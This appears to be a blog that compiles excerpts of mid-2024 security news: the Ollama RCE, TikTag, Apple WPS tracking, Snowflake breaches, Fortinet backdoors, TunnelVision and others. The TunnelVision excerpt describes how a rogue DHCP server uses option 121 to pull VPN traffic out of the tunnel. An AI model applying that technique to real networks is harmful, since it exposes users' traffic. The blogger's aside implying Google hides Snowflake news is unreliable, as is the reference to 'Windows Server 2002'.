Patch now: ‘Easy-to-exploit’ RCE in open source Ollama

A now-patched vulnerability in Ollama – a popular open source project for running LLMs – can lead to remote code execution, according to flaw finders who warned that upwards of 1,000 vulnerable instances remain exposed to the internet.

Wiz Research disclosed the flaw, tracked as CVE-2024-37032 and dubbed Probllama, on May 5 and its maintainers fixed the issue in version 0.1.34 that was released via GitHub a day later.

Ollama is useful for performing inference with compatible neural networks – such as Meta’s Llama family, hence the name; Microsoft’s Phi clan; and models from Mistral – and it can be used on the command line or via a REST API. It has hundreds of thousands of monthly pulls on Docker Hub.

In a report published today, the Wiz bug hunting team’s Sagi Tzadik said the vulnerability is due to insufficient validation on the server side of that REST API provided by Ollama. An attacker could exploit the flaw by sending a specially crafted HTTP request to the Ollama API server — and in Docker installations, at least, the API server is publicly exposed.

The Ollama server provides multiple API endpoints that perform core functions. This includes the API endpoint /api/pull that lets users download models from the Ollama registry as well as private registries. As the researchers found, the process to trigger the download of a model was exploitable, allowing miscreants to potentially compromise the environment hosting a vulnerable Ollama server.

“What we found is that when pulling a model from a private registry (by querying the http://[victim]:11434/api/pull API endpoint), it is possible to supply a malicious manifest file that contains a path traversal payload in the digest field,” Tzadik explained.

An attacker could then use that payload to corrupt files on the system, achieve arbitrary file read, and ultimately remote code execution (RCE) to hijack that system.

“This issue is extremely severe in Docker installations, as the server runs with root privileges and listens on 0.0.0.0 by default – which enables remote exploitation of this vulnerability,” Tzadik emphasized.

And despite a patched version of the project being available for over a month, the Wiz kids found that, as of June 10, there were more than 1,000 of vulnerable Ollama server instances still exposed to the internet. In light of this, there’s a couple things anyone using Ollama should do to protect their AI applications.

First, which should go without saying, update instances to version 0.1.34 or newer. Also, as Ollama doesn’t inherently support authentication, do not expose installations to the internet unless using some sort of authentication, such as a reverse-proxy. Even better, don’t allow the internet to reach the server at all, put it behind firewalls, and only allow authorized internal applications and their users to access it.

“The critical issue is not just the vulnerabilities themselves but the inherent lack of authentication support in these new tools,” Tzadik noted, referring to previous RCEs in other tools used to deploy LLMs including TorchServe and Ray Anyscale.

Plus, he added, even those these tools are new and often written in modern safety-first programming languages, “classic vulnerabilities such as path traversal remain an issue.” ®

Source: Patch now: ‘Easy-to-exploit’ RCE in open source Ollama

Microsoft fixes hack-me-via-Wi-Fi Windows security hole

[…] CVE-2024-30078, a Wi-Fi driver remote code execution hole rated 8.8 in severity. It’s not publicly disclosed, not yet under attack, and exploitation is “less likely,” according to Redmond.

“An unauthenticated attacker could send a malicious networking packet to an adjacent system that is employing a Wi-Fi networking adapter, which could enable remote code execution,” and thus remotely, silently, and wirelessly run malware or spyware on that nearby victim’s computer, Microsoft admitted.

Childs said: “Considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.” Patch as soon as you can: This flaw can be abused to run malicious software on and hijack a nearby Windows PC via their Wi-Fi with no authentication needed. Pretty bad. […]

Source: Microsoft fixes hack-me-via-Wi-Fi Windows security hole • The Register

ASUS Releases Firmware Update for Critical Remote Authentication Bypass Affecting Seven Routers

A report from BleepingComputer notes that ASUS “has released a new firmware update that addresses a vulnerability impacting seven router models that allow remote attackers to log in to devices.” But there’s more bad news: Taiwan’s CERT has also informed the public about CVE-2024-3912 in a post yesterday, which is a critical (9.8) arbitrary firmware upload vulnerability allowing unauthenticated, remote attackers to execute system commands on the device. The flaw impacts multiple ASUS router models, but not all will be getting security updates due to them having reached their end-of-life (EoL).

Finally, ASUS announced an update to Download Master, a utility used on ASUS routers that enables users to manage and download files directly to a connected USB storage device via torrent, HTTP, or FTP. The newly released Download Master version 3.1.0.114 addresses five medium to high-severity issues concerning arbitrary file upload, OS command injection, buffer overflow, reflected XSS, and stored XSS problems.

Source: https://mobile.slashdot.org/story/24/06/17/0237229/asus-releases-firmware-update-for-critical-remote-authentication-bypass-affecting-seven-routers

Arm Memory Tag Extensions broken by speculative execution

In 2018, chip designer Arm introduced a hardware security feature called Memory Tagging Extensions (MTE) as a defense against memory safety bugs. But it may not be as effective as first hoped.

Implemented and supported last year in Google’s Pixel 8 and Pixel 8 Pro phones and previously in Linux, MTE aims to help detect memory safety violations, as well as hardening devices against attacks that attempt to exploit memory safety flaws.

[…]

MTE works by tagging blocks of physical memory with metadata. This metadata serves as a key that permits access. When a pointer references data within a tagged block of memory, the hardware checks to make sure the pointer contains a key matching that of the memory block to gain access to the data. A mismatch throws out an error.

Tag, you’re IT

Diving deeper, when MTE is active, programs can use special instructions to tag 16-byte blocks of physical memory with a 4-bit key. For example, when allocating a chunk of memory from the heap, that chunk (aligned and rounded to 16 bytes) can be tagged with the same 4-bit key, and a pointer to that chunk is generated containing the key in its upper unused bits.

When the program uses that pointer in future, referencing some part of the block, everything works fine. The pointer still contains the correct key. But if the block is freed and its key is changed, subsequent use of that stale pointer will trigger a fault by the processor, due to a mismatching key, which indicates a programming bug or a vulnerability exploit attempt, both of which you want to catch.

And if the program is hijacked via some other vulnerability, and the code is made to reference a tagged block without the right key in the pointer, that will also be caught.

[…]

Unfortunately, MTE appears to be insufficiently secure to fulfill its security promises. Researchers affiliated with Seoul National University in South Korea, Samsung Research, and Georgia Institute of Technology in the US have found that they can break MTE through speculative execution.

The authors – Juhee Kim, Jinbum Park, Sihyeon Roh, Jaeyoung Chung, Youngjoo Lee, Taesoo Kim, and Byoungyoung Lee – say as much in their research paper, “TikTag: Breaking Arm’s Memory Tagging Extension with Speculative Execution.”

Having looked at MTE to assess whether it provides the claimed security benefit, the boffins say it does not. Instead, they found they could extract MTE tags in under four seconds around 95 per cent of the time.

“[W]e found that speculative execution attacks are indeed possible against MTE, which severely harms the security assurance of MTE,” the authors report. “We discovered two new gadgets, named TIKTAG-v1 and TIKTAG-v2, which can leak the MTE tag of an arbitrary memory address.”

[…]

The authors say that their research expands on prior work from May 2024 that found MTE vulnerable to speculative probing. What’s more, they contend their findings challenge work by Google’s Project Zero that found no side-channel attack capable of breaking MTE.

Using proof-of-concept code, MTE tags were ferreted out of Google Chrome on Android and the Linux kernel using this technique, with a success rate that exceeded 95 percent in less than four seconds, it’s claimed.

The authors have made their code available on GitHub. “When TikTag gadgets are speculatively executed, cache state differs depending on whether the gadgets trigger a tag check fault or not,” the code repo explains. “Therefore, by observing the cache states, it is possible to leak the tag check results without raising any exceptions.”

Access to leaked tags doesn’t ensure exploitation. It simply means that an attacker capable of exploiting a particular memory bug on an affected device wouldn’t be thwarted by MTE.

The researchers disclosed their findings to Arm, which acknowledged them in a developer note published in December 2023. The chip design firm said that timing differences in successful and failed tag checking can be enough to create an MTE speculative oracle – a mechanism to reveal MTE tags – in Cortex-X2, Cortex-X3, Cortex-A510, Cortex-A520, Cortex-A710, Cortex-A715, and Cortex-A720 processors.

[…]

Source: Arm Memory Tag Extensions broken by speculative execution • The Register

Wi-Fi Routers are like an trackers available to everyone

Apple and the satellite-based broadband service Starlink each recently took steps to address new research into the potential security and privacy implications of how their services geo-locate devices. Researchers from the University of Maryland say they relied on publicly available data from Apple to track the location of billions of devices globally — including non-Apple devices like Starlink systems — and found they could use this data to monitor the destruction of Gaza, as well as the movements and in many cases identities of Russian and Ukrainian troops.

At issue is the way that Apple collects and publicly shares information about the precise location of all Wi-Fi access points seen by its devices. Apple collects this location data to give Apple devices a crowdsourced, low-power alternative to constantly requesting global positioning system (GPS) coordinates.

Both Apple and Google operate their own Wi-Fi-based Positioning Systems (WPS) that obtain certain hardware identifiers from all wireless access points that come within range of their mobile devices. Both record the Media Access Control (MAC) address that a Wi-FI access point uses, known as a Basic Service Set Identifier or BSSID.

Periodically, Apple and Google mobile devices will forward their locations — by querying GPS and/or by using cellular towers as landmarks — along with any nearby BSSIDs. This combination of data allows Apple and Google devices to figure out where they are within a few feet or meters, and it’s what allows your mobile phone to continue displaying your planned route even when the device can’t get a fix on GPS.

[…]

In essence, Google’s WPS computes the user’s location and shares it with the device. Apple’s WPS gives its devices a large enough amount of data about the location of known access points in the area that the devices can do that estimation on their own.

That’s according to two researchers at the University of Maryland, who theorized they could use the verbosity of Apple’s API to map the movement of individual devices into and out of virtually any defined area of the world. The UMD pair said they spent a month early in their research continuously querying the API, asking it for the location of more than a billion BSSIDs generated at random.

They learned that while only about three million of those randomly generated BSSIDs were known to Apple’s Wi-Fi geolocation API, Apple also returned an additional 488 million BSSID locations already stored in its WPS from other lookups.

[…]

Plotting the locations returned by Apple’s WPS between November 2022 and November 2023, Levin and Rye saw they had a near global view of the locations tied to more than two billion Wi-Fi access points. The map showed geolocated access points in nearly every corner of the globe, apart from almost the entirety of China, vast stretches of desert wilderness in central Australia and Africa, and deep in the rainforests of South America.

A “heatmap” of BSSIDs the UMD team said they discovered by guessing randomly at BSSIDs.

The researchers said that by zeroing in on or “geofencing” other smaller regions indexed by Apple’s location API, they could monitor how Wi-Fi access points moved over time. Why might that be a big deal? They found that by geofencing active conflict zones in Ukraine, they were able to determine the location and movement of Starlink devices used by both Ukrainian and Russian forces.

The reason they were able to do that is that each Starlink terminal — the dish and associated hardware that allows a Starlink customer to receive Internet service from a constellation of orbiting Starlink satellites — includes its own Wi-Fi access point, whose location is going to be automatically indexed by any nearby Apple devices that have location services enabled.

A heatmap of Starlink routers in Ukraine. Image: UMD.

The University of Maryland team geo-fenced various conflict zones in Ukraine, and identified at least 3,722 Starlink terminals geolocated in Ukraine.

“We find what appear to be personal devices being brought by military personnel into war zones, exposing pre-deployment sites and military positions,” the researchers wrote. “Our results also show individuals who have left Ukraine to a wide range of countries, validating public reports of where Ukrainian refugees have resettled.”

[…]

The researchers also focused their geofencing on the Israel-Hamas war in Gaza, and were able to track the migration and disappearance of devices throughout the Gaza Strip as Israeli forces cut power to the country and bombing campaigns knocked out key infrastructure.

“As time progressed, the number of Gazan BSSIDs that are geolocatable continued to decline,” they wrote. “By the end of the month, only 28% of the original BSSIDs were still found in the Apple WPS.”

In late March 2024, Apple quietly updated its website to note that anyone can opt out of having the location of their wireless access points collected and shared by Apple — by appending “_nomap” to the end of the Wi-Fi access point’s name (SSID). Adding “_nomap” to your Wi-Fi network name also blocks Google from indexing its location.

[…]

Rye said Apple’s response addressed the most depressing aspect of their research: That there was previously no way for anyone to opt out of this data collection.

“You may not have Apple products, but if you have an access point and someone near you owns an Apple device, your BSSID will be in [Apple’s] database,” he said. “What’s important to note here is that every access point is being tracked, without opting in, whether they run an Apple device or not. Only after we disclosed this to Apple have they added the ability for people to opt out.”

The researchers said they hope Apple will consider additional safeguards, such as proactive ways to limit abuses of its location API.

[…]

“We observe routers move between cities and countries, potentially representing their owner’s relocation or a business transaction between an old and new owner,” they wrote. “While there is not necessarily a 1-to-1 relationship between Wi-Fi routers and users, home routers typically only have several. If these users are vulnerable populations, such as those fleeing intimate partner violence or a stalker, their router simply being online can disclose their new location.”

The researchers said Wi-Fi access points that can be created using a mobile device’s built-in cellular modem do not create a location privacy risk for their users because mobile phone hotspots will choose a random BSSID when activated.

[…]

For example, they discovered that certain commonly used travel routers compound the potential privacy risks.

“Because travel routers are frequently used on campers or boats, we see a significant number of them move between campgrounds, RV parks, and marinas,” the UMD duo wrote. “They are used by vacationers who move between residential dwellings and hotels. We have evidence of their use by military members as they deploy from their homes and bases to war zones.”

A copy of the UMD research is available here (PDF).

Source: Why Your Wi-Fi Router Doubles as an Apple AirTag – Krebs on Security

Over 165 Snowflake customers didn’t use MFA, says Mandiant

An unknown financially motivated crime crew has swiped a “significant volume of records” from Snowflake customers’ databases using stolen credentials, according to Mandiant.

“To date, Mandiant and Snowflake have notified approximately 165 potentially exposed organizations,” the Google-owned threat hunters wrote on Monday, and noted they track the perps as “UNC5537.”

The crew behind the Snowflake intrusions may have ties to Scattered Spider, aka UNC3944 – the notorious gang behind the mid-2023 Las Vegas casino breaches.

“Mandiant is investigating the possibility that a member of UNC5537 collaborated with UNC3944 on at least one past intrusion in the past six months, but we don’t have enough data to confidently link UNC5537 to a broader group at this time,” senior threat analyst Austin Larsen told The Register.

Mandiant – one of the incident response firms hired by Snowflake to help investigate its recent security incident – also noted that there’s no evidence a breach of Snowflake’s own enterprise environment was to blame for its customers’ breaches.

“Instead, every incident Mandiant responded to associated with this campaign was traced back to compromised customer credentials,” the Google-owned threat hunters confirmed.

The earliest detected attack against a Snowflake customer instance happened on April 14. Upon investigating that breach, Mandiant says it determined that UNC5537 used legitimate credentials – previously stolen using infostealer malware – to break into the victim’s Snowflake environment and exfiltrate data. The victim did not have multi-factor authentication turned on.

About a month later, after uncovering “multiple” Snowflake customer compromises, Mandiant contacted the cloud biz and the two began notifying affected organizations. By May 24 the criminals had begun selling the stolen data online, and on May 30 Snowflake issued its statement about the incidents.

After gaining initial access – which we’re told occurred through the Snowflake native web-based user interface or a command-line-interface running on Windows Server 2002 – the criminals used a horribly named utility, “rapeflake,” which Mandiant has instead chosen to track as “FROSTBITE.”

UNC5537 has used both .NET and Java versions of this tool to perform reconnaissance against targeted Snowflake customers, allowing the gang to identify users, their roles, and IP addresses.

The crew also sometimes uses DBeaver Ultimate – a publicly available database management utility – to query Snowflake instances.

Several of the initial compromises occurred on contractor systems that were being used for both work and personal activities.

“These devices, often used to access the systems of multiple organizations, present a significant risk,” Mandiant researchers wrote. “If compromised by infostealer malware, a single contractor’s laptop can facilitate threat actor access across multiple organizations, often with IT and administrator-level privileges.”

All of the successful intrusions had three things in common, according to Mandiant. First, the victims didn’t use MFA.

Second, the attackers used valid credentials, “hundreds” of which were stolen thanks to infostealer infections – some as far back as 2020. Common variants used included VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER. But even in these years-old thefts, the credentials had not been updated or rotated.

Almost 80 percent of the customer accounts accessed by UNC5537 had prior credential exposure, we’re told.

Finally, the compromised accounts did not have network allow-lists in place. So if you are a Snowflake customer, it’s time to get a little smarter.

Source: Over 165 Snowflake customers didn’t use MFA, says Mandiant • The Register

Oddly enough, they don’t mention the Ticketmaster 560m+ account hack confirmed in what seems to be a spree hitting Snowflake customers considering the size of the hack! Also, oddly enough, when you Google Snowflake, you get the corporate page, some wikipedia entries, but not very much about the hack. Considering the size and breadth of the problem, this is surprising. But perhaps not, considering it’s a part of Google.

China state hackers infected 20,000 govt and defence Fortinet VPNs, due to at least 2 month unfixed critical vulnerability

Hackers working for the Chinese government gained access to more than 20,000 VPN appliances sold by Fortinet using a critical vulnerability that the company failed to disclose for two weeks after fixing it, Netherlands government officials said.

The vulnerability, tracked as CVE-2022-42475, is a heap-based buffer overflow that allows hackers to remotely execute malicious code. It carries a severity rating of 9.8 out of 10. A maker of network security software, Fortinet silently fixed the vulnerability on November 28, 2022, but failed to mention the threat until December 12 of that year, when the company said it became aware of an “instance where this vulnerability was exploited in the wild.” On January 11, 2023—more than six weeks after the vulnerability was fixed—Fortinet warned a threat actor was exploiting it to infect government and government-related organizations with advanced custom-made malware.

Enter CoatHanger

The Netherlands officials first reported in February that Chinese state hackers had exploited CVE-2022-42475 to install an advanced and stealthy backdoor tracked as CoatHanger on Fortigate appliances inside the Dutch Ministry of Defense. Once installed, the never-before-seen malware, specifically designed for the underlying FortiOS operating system, was able to permanently reside on devices even when rebooted or receiving a firmware update. CoatHanger could also escape traditional detection measures, the officials warned. The damage resulting from the breach was limited, however, because infections were contained inside a segment reserved for non-classified uses.

On Monday, officials with the Military Intelligence and Security Service (MIVD) and the General Intelligence and Security Service in the Netherlands said that to date, Chinese state hackers have used the critical vulnerability to infect more than 20,000 FortiGate VPN appliances sold by Fortinet. Targets include dozens of Western government agencies, international organizations, and companies within the defense industry.

“Since then, the MIVD has conducted further investigation and has shown that the Chinese cyber espionage campaign appears to be much more extensive than previously known,” Netherlands officials with the National Cyber Security Center wrote. “The NCSC therefore calls for extra attention to this campaign and the abuse of vulnerabilities in edge devices.”

Monday’s report said that exploitation of the vulnerability started two months before Fortinet first disclosed it and that 14,000 servers were backdoored during this zero-day period. The officials warned that the Chinese threat group likely still has access to many victims because CoatHanger is so hard to detect and remove.

[…]

Fortinet’s failure to timely disclose is particularly acute given the severity of the vulnerability. Disclosures are crucial because they help users prioritize the installation of patches. When a new version fixes minor bugs, many organizations often wait to install it. When it fixes a vulnerability with a 9.8 severity rating, they’re much more likely to expedite the update process. Given the vulnerability was being exploited even before Fortinet fixed it, the disclosure likely wouldn’t have prevented all of the infections, but it stands to reason it could have stopped some.

Fortinet officials have never explained why they didn’t disclose the critical vulnerability when it was fixed. They have also declined to disclose what the company policy is for the disclosure of security vulnerabilities. Company representatives didn’t immediately respond to an email seeking comment for this post.

Source: China state hackers infected 20,000 Fortinet VPNs, Dutch spy service says | Ars Technica

Largest ever operation by Europol against botnets hits dropper malware ecosystem

Between 27 and 29 May 2024 Operation Endgame, coordinated from Europol’s headquarters, targeted droppers including, IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The actions focused on disrupting criminal services through arresting High Value Targets, taking down the criminal infrastructures and freezing illegal proceeds. This approach had a global impact on the dropper ecosystem. The malware, whose infrastructure was taken down during the action days, facilitated attacks with ransomware and other malicious software. Following the action days, eight fugitives linked to these criminal activities, wanted by Germany, will be added to Europe’s Most Wanted list on 30 May 2024. The individuals are wanted for their involvement in serious cybercrime activities.

This is the largest ever operation against botnets, which play a major role in the deployment of ransomware. The operation, initiated and led by France, Germany and the Netherlands was also supported by Eurojust and involved Denmark, the United Kingdom and the United States. In addition, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland and Ukraine also supported the operation with different actions, such as arrests, interviewing suspects, searches, and seizures or takedowns of servers and domains. The operation was also supported by a number of private partners at national and international level including Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus and DIVD.

The coordinated actions led to:

  • 4 arrests (1 in Armenia and 3 in Ukraine)
  • 16 location searches (1 in Armenia, 1 in the Netherlands, 3 in Portugal and 11 in Ukraine)
  • Over 100 servers taken down or disrupted in Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States and Ukraine
  • Over 2 000 domains under the control of law enforcement

Furthermore, it has been discovered through the investigations so far that one of the main suspects has earned at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware.

[…]

Operation Endgame does not end today. New actions will be announced on the website Operation Endgame. In addition, suspects involved in these and other botnets, who have not yet been arrested, will be directly called to account for their actions. Suspects and witnesses will find information on how to reach out via this website.

Command post at Europol to coordinate the operational actions

Europol facilitated the information exchange and provided analytical, crypto-tracing and forensic support to the investigation. To support the coordination of the operation, Europol organised more than 50 coordination calls with all the countries as well as an operational sprint at its headquarters.

Over 20 law enforcement officers from Denmark, France, Germany and the United States supported the coordination of the operational actions from the command post at Europol and hundreds of other officers from the different countries involved in the actions. In addition, a virtual command post allowed real-time coordination between the Armenian, French, Portuguese and Ukrainian officers deployed on the spot during the field activities.

The command post at Europol facilitated the exchange of intelligence on seized servers, suspects and the transfer of seized data. Local command posts were also set up in Germany, the Netherlands, Portugal, the United States and Ukraine. Eurojust supported the action by setting up a coordination centre at its headquarters to facilitate the judicial cooperation between all authorities involved. Eurojust also assisted with the execution of European Arrest Warrants and European Investigation Orders.

[…]

Source: Largest ever operation against botnets hits dropper malware ecosystem | Europol

2.8M US folks’ personal info swiped in Sav-Rx IT heist – 8 months ago

Sav-Rx has started notifying about 2.8 million people that their personal information was likely stolen during an IT intrusion that happened more than seven months ago.

The biz provides prescription drug management services to more than 10 million US workers and their families, via their employers or unions. It first spotted the network “interruption” on October 8 last year and notes the break-in likely occurred five days earlier, according to a FAQ page about the incident posted on the Sav-Rx website.

Sav-Rx says it restored the IT systems to normal the following business day, and says all prescriptions were shipped on time and without delay. It also notified the police and called in some experts for a deeper dive into the logs.

An “extensive review” completed by a third-party security team on April 30 confirmed “some of the data accessed or acquired by the unauthorized third party may have contained personal information.”

The security breach affected 2,812,336 people, according to an incident notification filed with the Maine attorney general by A&A Services, doing business as Sav-Rx. Potentially stolen details include patients’ names, dates of birth, social security numbers, email addresses, mailing addresses, phone numbers, eligibility data, and insurance identification numbers.

“Please note that other than these data elements, the threat actor did not have access to clinical or financial information,” the notice reads.

While there’s no indication that the crooks have “made any use of your data as a result of this security incident,” Sav-Rx is providing everyone with two years of free credit and identity monitoring, as seems to be standard practice.

There’s also an oddly worded line about what happened that notes, “in conjunction with third-party experts, we have confirmed that any data acquired from our IT system was destroyed and not further disseminated.”

The Register contacted Sav-Rx with several questions about the network breach — including how it confirmed the data was destroyed and if the crooks demanded a payment — and did not receive a response. We will update this story when we hear back. It seems like some form of ransomware or extortion.

Either anticipating, or already receiving, inquiries about why the lag between discovering the intrusion and then notifying affected parties, the FAQ also includes a “Why wasn’t I contacted sooner?” question.

“Our initial priority was restoring systems to minimize any interruption to patient care,” it answers.

And then, after securing the IT systems and hiring the incident response team, Sav-Rx launched an investigation to determine who had been affected, and what specific personal information had been stolen for each of them.

Then, it sounds like there was some back-and-forth between healthcare bodies and Sav-Rx as to who would notify people that their data had been stolen. Here’s what the company says to that point:

We prioritized this technological investigation to be able to provide affected individuals with as much accurate information as possible. We received the results of that investigation on April 30, 2024, and promptly sent notifications to our health plan customers whose participant data was affected within 48 hours.

We offered to provide affected individuals notification, and once we confirmed that their respective health plans wanted us to provide notice to their participants, we worked expediently to mail notices to the affected individuals.

It’s unclear if this will be enough to satisfy affected customers. But in a statement to reporters, Roger Grimes, of infosec house KnowBe4, said the short answer is probably not.

“I don’t think the eight months it took Sav-Rx to notify impacted customers of the breach is going to fly with anyone, least of all their customers,” Grimes said.

“Today, you’ve got most companies notifying impacted customers in days to a few weeks,” he added. “Eight months? Whoever decided on that decision is likely to come under some heat and have explaining to do.”

Sav-Rx claims to have implemented a “number of detailed and immediate mitigation measures” to improve its security after the digital break-in. This includes “enhancing” its always-on security operations center, and adding new firewalls, antivirus software, and multi-factor authentication.

The organization also says it has since implemented a patching cycle and network segmentation and taken other measures to harden its systems. Hopefully it can also speed up its response times if it happens again.

Source: 2.8M US folks’ personal info swiped in Sav-Rx IT heist • The Register

US Patent and Trademark Office confirms another leak of filers’ address data

The federal government agency responsible for granting patents and trademarks is alerting thousands of filers whose private addresses were exposed following a second data spill in as many years.

The U.S. Patent and Trademark Office (USPTO) said in an email to affected trademark applicants this week that their private domicile address — which can include their home address — appeared in public records between August 23, 2023 and April 19, 2024.

U.S. trademark law requires that applicants include a private address when filing their paperwork with the agency to prevent fraudulent trademark filings.

USPTO said that while no addresses appeared in regular searches on the agency’s website, about 14,000 applicants’ private addresses were included in bulk datasets that USPTO publishes online to aid academic and economic research.

The agency took blame for the incident, saying the addresses were “inadvertently exposed as we transitioned to a new IT system,” according to the email to affected applicants, which TechCrunch obtained. “Importantly, this incident was not the result of malicious activity,” the email said.

Upon discovery of the security lapse, the agency said it “blocked access to the impacted bulk data set, removed files, implemented a patch to fix the exposure, tested our solution, and re-enabled access.”

If this sounds remarkably familiar, USPTO had a similar exposure of applicants’ address data last June. At the time, USPTO said it inadvertently exposed about 61,000 applicants’ private addresses in a years-long data spill in part through the release of its bulk datasets, and told affected individuals that the issue was fixed.

[…]

Source: US Patent and Trademark Office confirms another leak of filers’ address data | TechCrunch

Attack against virtually all VPN apps neuters their entire purpose

Researchers have devised an attack against nearly all virtual private network applications that forces them to send and receive some or all traffic outside of the encrypted tunnel designed to protect it from snooping or tampering.

TunnelVision, as the researchers have named their attack, largely negates the entire purpose and selling point of VPNs, which is to encapsulate incoming and outgoing Internet traffic in an encrypted tunnel and to cloak the user’s IP address. The researchers believe it affects all VPN applications when they’re connected to a hostile network and that there are no ways to prevent such attacks except when the user’s VPN runs on Linux or Android. They also said their attack technique may have been possible since 2002 and may already have been discovered and used in the wild since then.

Reading, dropping, or modifying VPN traffic

The effect of TunnelVision is “the victim’s traffic is now decloaked and being routed through the attacker directly,” a video demonstration explained. “The attacker can read, drop or modify the leaked traffic and the victim maintains their connection to both the VPN and the Internet.”

TunnelVision – CVE-2024-3661 – Decloaking Full and Split Tunnel VPNs – Leviathan Security Group.

The attack works by manipulating the DHCP server that allocates IP addresses to devices trying to connect to the local network. A setting known as option 121 allows the DHCP server to override default routing rules that send VPN traffic through a local IP address that initiates the encrypted tunnel. By using option 121 to route VPN traffic through the DHCP server, the attack diverts the data to the DHCP server itself. Researchers from Leviathan Security explained:

Our technique is to run a DHCP server on the same network as a targeted VPN user and to also set our DHCP configuration to use itself as a gateway. When the traffic hits our gateway, we use traffic forwarding rules on the DHCP server to pass traffic through to a legitimate gateway while we snoop on it.

We use DHCP option 121 to set a route on the VPN user’s routing table. The route we set is arbitrary and we can also set multiple routes if needed. By pushing routes that are more specific than a /0 CIDR range that most VPNs use, we can make routing rules that have a higher priority than the routes for the virtual interface the VPN creates. We can set multiple /1 routes to recreate the 0.0.0.0/0 all traffic rule set by most VPNs.

Pushing a route also means that the network traffic will be sent over the same interface as the DHCP server instead of the virtual network interface. This is intended functionality that isn’t clearly stated in the RFC. Therefore, for the routes we push, it is never encrypted by the VPN’s virtual interface but instead transmitted by the network interface that is talking to the DHCP server. As an attacker, we can select which IP addresses go over the tunnel and which addresses go over the network interface talking to our DHCP server.

A malicious DHCP option 121 route that causes traffic to never be encrypted by the VPN process.
Enlarge / A malicious DHCP option 121 route that causes traffic to never be encrypted by the VPN process.
Leviathan Security

We now have traffic being transmitted outside the VPN’s encrypted tunnel. This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server. We can artificially create that scenario by setting a short lease time in the DHCP lease, so the user updates their routing table more frequently. In addition, the VPN control channel is still intact because it already uses the physical interface for its communication. In our testing, the VPN always continued to report as connected, and the kill switch was never engaged to drop our VPN connection.

The attack can most effectively be carried out by a person who has administrative control over the network the target is connecting to. In that scenario, the attacker configures the DHCP server to use option 121. It’s also possible for people who can connect to the network as an unprivileged user to perform the attack by setting up their own rogue DHCP server.

The attack allows some or all traffic to be routed through the unencrypted tunnel. In either case, the VPN application will report that all data is being sent through the protected connection. Any traffic that’s diverted away from this tunnel will not be encrypted by the VPN and the Internet IP address viewable by the remote user will belong to the network the VPN user is connected to, rather than one designated by the VPN app.

Interestingly, Android is the only operating system that fully immunizes VPN apps from the attack because it doesn’t implement option 121. For all other OSes, there are no complete fixes. When apps run on Linux there’s a setting that minimizes the effects, but even then TunnelVision can be used to exploit a side channel that can be used to de-anonymize destination traffic and perform targeted denial-of-service attacks. Network firewalls can also be configured to deny inbound and outbound traffic to and from the physical interface. This remedy is problematic for two reasons: (1) a VPN user connecting to an untrusted network has no ability to control the firewall and (2) it opens the same side channel present with the Linux mitigation.

The most effective fixes are to run the VPN inside of a virtual machine whose network adapter isn’t in bridged mode or to connect the VPN to the Internet through the Wi-Fi network of a cellular device. The research, from Leviathan Security researchers Lizzie Moratti and Dani Cronce, is available here.

Source: Novel attack against virtually all VPN apps neuters their entire purpose | Ars Technica

Microsoft’s latest Windows security updates might break your VPN

Microsoft says the April security updates for Windows may break your VPN. (Oops!) “Windows devices might face VPN connection failures after installing the April 2024 security update (KB5036893) or the April 2024 non-security preview update,” the company wrote in a status update. It’s working on a fix.

Bleeping Computer first reported the issue, which affects Windows 11, Windows 10 and Windows Server 2008 and later. User reports on Reddit are mixed, with some commenters saying their VPNs still work after installing the update and others claiming their encrypted connections were indeed borked.

“We are working on a resolution and will provide an update in an upcoming release,” Microsoft wrote.

There’s no proper fix until Microsoft pushes a patched update. However, you can work around the issue by uninstalling all the security updates. In an unfortunate bit of timing for CEO Satya Nadella, he said last week that he wants Microsoft to put “security above else.” I can’t imagine making customers (temporarily) choose between going without a VPN and losing the latest protection is what he had in mind.

At least one Redditor claims that uninstalling and reinstalling their VPN app fixed the problem for them, so it may be worth trying that before moving on to more drastic measures.

If you decide to uninstall the security updates, Microsoft tells you how. “To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument,” the company wrote in its patch notes. “You can find the package name by using this command: DISM /online /get-packages.”

Source: Microsoft’s latest Windows security updates might break your VPN

UK becomes first country to ban default bad passwords on IoT devices

[…] On Monday, the United Kingdom became the first country in the world to ban default guessable usernames and passwords from these IoT devices. Unique passwords installed by default are still permitted.

The Product Security and Telecommunications Infrastructure Act 2022 (PSTI) introduces new minimum-security standards for manufacturers, and demands that these companies are open with consumers about how long their products will receive security updates for.

Manufacturing and design practices mean many IoT products introduce additional risks to the home and business networks they’re connected to. In one often-cited case described by cybersecurity company Darktrace, hackers were allegedly able to steal data from a casino’s otherwise well-protected computer network after breaking in through an internet-connected temperature sensor in a fish tank.

Under the PSTI, weak or easily guessable default passwords such as “admin” or “12345” are explicitly banned, and manufacturers are also required to publish contact details so users can report bugs.

Products that fail to comply with the rules could face being recalled, and the companies responsible could face a maximum fine of £10 million ($12.53 million) or 4% of their global revenue, whichever is higher.

The law will be regulated by the Office for Product Safety and Standards (OPSS), which is part of the Department for Business and Trade rather than an independent body.

[…]

Similar laws are being advanced elsewhere, although none have entered into effect. The European Union’s Cyber Resilience Act is yet to be finally agreed, but its similar provisions aren’t expected to apply within the bloc until 2027.

There is no federal law about securing consumer IoT devices in the United States, although the IoT Cybersecurity Improvement Act of 2020 requires the National Institute of Standards and Technology “to develop and publish standards and guidelines for the federal government” on how they use IoT devices.

Source: UK becomes first country to ban default bad passwords on IoT devices

Apple’s ‘incredibly private’ Safari not so private in Europe, allows

Apple’s grudging accommodation of European antitrust rules by allowing third-party app stores on iPhones has left users of its Safari browser exposed to potential web activity tracking.

Developers Talal Haj Bakry and Tommy Mysk looked into the way Apple implemented the installation process for third-party software marketplaces on iOS with Safari, and concluded Cupertino’s approach is particularly shoddy.

“Our testing shows that Apple delivered this feature with catastrophic security and privacy flaws,” wrote Bakry and Mysk in an advisory published over the weekend.

